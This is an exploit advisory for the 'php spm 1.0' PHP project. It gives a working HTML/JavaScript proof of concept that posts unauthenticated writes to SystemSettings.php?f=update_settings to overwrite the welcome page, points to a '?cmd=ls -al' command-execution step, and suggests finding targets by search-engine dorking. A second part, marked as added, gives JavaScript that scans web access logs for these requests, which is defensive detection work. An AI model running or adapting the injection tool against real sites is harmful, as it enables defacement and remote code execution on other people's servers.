=============================================================================================================================================
| # Title     : php spm 1.0 php code injection Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 : set your file name & payload.

[+] Save the payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> PHP code injection Tool</title>
    <script>
        async function sendRequest() {
            const url = document.getElementById('url').value;
            const postData = {
                'content[welcome]': `Hacked by indoushka`
            };
            try {
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded'
                    },
                    body: new URLSearchParams(postData).toString()
                });
                if (response.ok) {
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';
                } else {
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;
                }
            } catch (error) {
                document.getElementById('result').innerText = 'Error making request: ' + error.message;
            }
        }
    </script>
</head>
<body>
    <h1>Injection Tool</h1>
    <form onsubmit="event.preventDefault(); sendRequest();">
        <label for="url">Enter URL:</label>
        <input type="text" id="url" name="url" required>
        <button type="submit">Submit</button>
    </form>
    <pre id="result"></pre>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
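
The two requests the PoC above makes (a POST to `classes/SystemSettings.php?f=update_settings`, then a request to `/?cmd=...`) both appear in web-server access logs. The following is an added example, not part of the original advisory: it scans access-log lines for writes to that endpoint and for requests carrying a `cmd` parameter, and marks the ones that follow a write from the same client. The log lines are constructed samples in combined log format, and the names `parseLine` and `detect` and the `/spms/` install prefix are assumptions.

```javascript
// Constructed sample lines (combined log format, documentation-range IPs).
const SAMPLE_LOG = [
  '198.51.100.7 - - [01/Oct/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
  '203.0.113.9 - - [01/Oct/2024:10:02:11 +0000] "POST /classes/SystemSettings.php?f=update_settings HTTP/1.1" 200 1',
  '203.0.113.9 - - [01/Oct/2024:10:02:15 +0000] "GET /?cmd=ls%20-al HTTP/1.1" 200 2048',
  '198.51.100.7 - - [01/Oct/2024:10:05:00 +0000] "POST /spms/classes/SystemSettings.php?f=update_settings HTTP/1.1" 200 1',
  '198.51.100.23 - - [01/Oct/2024:10:06:00 +0000] "GET /?page=about HTTP/1.1" 200 900',
];

// Captures: client, timestamp, method, request target, status.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  try {
    // Resolve against a dummy origin to split and decode path and query.
    const url = new URL(m[4], 'http://log.invalid');
    return { ip: m[1], time: m[2], method: m[3], status: Number(m[5]),
             path: url.pathname.toLowerCase(), query: url.searchParams };
  } catch {
    return null; // unparseable request target
  }
}

function detect(lines) {
  const writers = new Set(); // clients that already wrote settings
  const findings = [];
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    const isWrite = e.method === 'POST' &&
      e.path.endsWith('/classes/systemsettings.php') &&
      e.query.get('f') === 'update_settings';
    if (isWrite) {
      writers.add(e.ip);
      findings.push({ kind: 'settings_write', ip: e.ip, time: e.time, status: e.status });
    } else if (e.query.has('cmd')) {
      // A cmd= request after a settings write from the same client is the stronger signal.
      const kind = writers.has(e.ip) ? 'cmd_after_write' : 'cmd_param';
      findings.push({ kind, ip: e.ip, time: e.time, value: e.query.get('cmd') });
    }
  }
  return findings;
}

console.log(detect(SAMPLE_LOG));
```

Access logs do not record POST bodies, so each `settings_write` finding still has to be checked against known administrator activity and the current content of the welcome page.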